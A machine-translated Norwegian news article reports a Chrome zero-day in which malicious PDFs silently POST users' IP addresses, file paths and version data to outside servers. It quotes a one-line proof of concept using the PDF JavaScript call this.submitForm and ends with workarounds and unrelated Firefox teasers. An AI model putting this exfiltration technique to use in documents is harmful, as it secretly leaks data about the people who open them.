Chrome-sårbarhet lar hackere samle inn brukerdata via pdf-filer
Innholdsfortegnelse:
Video: Skriv i PDF 2024
Utnytt deteksjonstjeneste EdgeSpot oppdaget et spennende Chrome-dagers sårbarhet som utnyttet PDF-dokumenter. Sårbarheten lar angripere høste sensitive data ved å bruke skadelige PDF-dokumenter som er åpnet i Chrome.
Så snart offeret åpner de respektive PDF-filene i Google Chrome, begynner et skadelig program å fungere i bakgrunnen ved å samle inn brukerdata.
Dataene blir deretter videresendt til den eksterne serveren som blir kontrollert av hackerne. Du lurer kanskje på hvilke data som blir sugd av angriperne, de målretter følgende data på PCen din:
- IP adresse
- Full bane for PDF-filen på systemet
- OS- og Chrome-versjoner
Pass på skadelige PDF-filer
Du kan bli overrasket over å vite at ingenting skjer når Adobe Reader brukes til å åpne PDF-filer. I tillegg brukes HTTP POST-forespørsler for å overføre data til eksterne servere uten brukerintervensjon.
Eksperter oppdaget at ett av de to domenene readnotifycom eller burpcollaboratornet mottok dataene.
Du kan forestille deg intensiteten av angrepet ved å vurdere det faktum at det meste av antivirusprogramvaren ikke er i stand til å oppdage prøvene som er oppdaget av EdgeSpot.
Eksperter avslører at angriperne bruker “this.submitForm ()” PDF Javascript API for å samle inn sensitiv informasjon fra brukerne.
Vi testet det med en minimal PoC, en enkel API-samtale som “this.submitForm ('http://google.com/test')" vil gjøre at Google Chrome sender personopplysningene til google.com.
Ekspertene fant faktisk ut at denne Chrome-feilen ble utnyttet av to forskjellige sett med ondsinnede PDF-filer. Begge ble sirkulert i henholdsvis oktober 2017 og september 2018.
Spesielt kan de innsamlede dataene brukes av angriperne til å finjustere angrep i fremtiden. Rapporter antyder at den første batch med filer ble satt sammen ved hjelp av ReadNotifys PDF-sporingstjeneste.
Brukere kan bruke tjenesten for å holde oversikt over brukervisninger. EdgeSpot har ikke delt noen detaljer angående arten av det andre settet med PDF-filer.
Slik holder du deg beskyttet
Exploit-gjenkjenningstjenesten EdgeSpot ønsket å varsle Chrome-brukerne om potensielle risikoer, fordi lappen ikke forventes å bli utgitt i løpet av nær fremtid.
EdgeSpot rapporterte til Google om sårbarheten i fjor, og selskapet lovet å gi ut en lapp i slutten av april. H
Du kan imidlertid vurdere å bruke en midlertidig løsning på problemet ved å lokalt se de mottatte PDF-dokumentene ved å bruke en alternativ PDF-leser-app.
Alternativt kan du også åpne PDF-dokumentene dine i Chrome ved å koble systemene dine fra Internett. I mellomtiden kan du vente til Chrome 74-oppdateringen som forventes rullet ut 23. april.
Mozilla firefox ønsker å samle inn data for "forskning"
Mozilla Firefox muller over ideen om å samle inn private nettleserdata for å hjelpe til med å forske på forskningen. Selskapet forsikrer at det vil være en valgfri opt-in.
Mozilla tilbakeviser påstander om at firefox-fokus samler inn brukerdata
Firefox Focus er en av få nettlesere som jobber med å beskytte brukernes personvern ved å blokkere analyser og sosiale sporere. En fersk rapport fra den tyske avisen Deutschlandfunk hevder imidlertid at appen selv samler inn brukerdata fra iOS-enheter. Sikkerhetsforsker Peter Welchering fortalte Deutschlandfunk at Firefox Klar, den tyske versjonen av Firefox Focus, samler personlig…
5 Beste programvare for å samle inn brukerdata med dybde og pålitelighet
Hvis du er ute etter den beste programvaren for å samle inn brukerdata med undersøkelser, kan du prøve Logikcull, Tableau, Looker, Nexticy eller GoFormz